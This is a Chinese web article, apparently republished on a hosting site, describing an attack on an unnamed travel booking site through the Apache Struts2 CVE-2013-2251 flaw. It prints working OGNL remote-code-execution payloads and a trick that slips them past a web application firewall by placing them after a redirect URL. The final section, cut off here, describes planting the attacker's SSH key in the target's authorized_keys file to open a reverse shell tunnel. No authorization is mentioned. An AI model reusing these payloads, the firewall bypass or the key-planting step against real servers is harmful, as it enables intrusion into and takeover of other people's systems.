如何利用Struts2漏洞绕过防火墙获取Root权限-网络管理-互联网-天达云

如何利用Struts2漏洞绕过防火墙获取Root权限
更新：HHH 时间：2023-1-7

如何利用Struts2漏洞绕过防火墙获取Root权限，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。

关于Apache struts2 CVE-2013–2251漏洞的，由于该漏洞可以导致远程代码执行，曾一度被广泛滥用。该漏洞原理在于，通过操纵前缀为“action:”/”redirect:”/”redirectAction:”的参数，在Struts 低于2.3.15的版本框架中实现远程代码执行。此次测试中，我不仅绕过了WAF防火墙实现远程代码执行，还利用了某Linux提权漏洞获取了目标服务器的root管理控制权。整个过程如下：

构造Payload被WAF拦截

首先我在测试一个旅游预订网站的时候，发现了其网站存在有漏洞的Apache Struts框架，又对“action, redirect,redirectAction”漏洞参数进行了必要的测试，为了实现漏洞利用，需要构造一个OGNL表达式，从这个网站上我得到了一些启示，由此，我构造了一个执行命令"ifconfig"的有效Payload：

redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

但不出所料，以上Payload却被目标服务器上的应用层防火墙拦截了，返回了以下bots响应页面：

这时，我总会从根本性上来分析问题，之前提到过，漏洞参数中涉及 “Redirect”，而上述Payload也是利用了 “Redirect”参数构造的，那我们再对目标网站的请求作个Redirect测试吧，把请求跳转到假设网站http://www.goal.com上来，如下：

构造Payload绕过WAF

可以看到，最终响应页面中是一个指向假设网站http://www.goal.com的302跳转页面。上述直接的Payload被防火墙阻挡了，而这里的跳转却能生效，那两者结合是不是可以玩个防火墙绕过呢？所以，也就有了以下Payload：

redirect:http://www.goal.com/${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

测试后发起的请求如下：

响应测试后，竟然能绕过防火墙执行ifconfig命令，哈哈，是时候欢呼了！

SSH方式获取shell

好吧，接下来，我就来尝试远程管理权限获取。我使用了反向SSH隧道和公钥身份验证进行了尝试，这种方式，允许SSH用户无需输入密码即可登录。为此呢，我需要把我入侵测试服务器AWS的SSH公钥放到目标服务器的授权认证列表~/.ssh/authorized_keys中去，并且，为了证实身份和作反向SSH连接，我还必需在我的测试服务器中添加进目标服务器的id_rsa.pub公钥。这里涉及的公钥认证概念可参考此处public key authentication说明。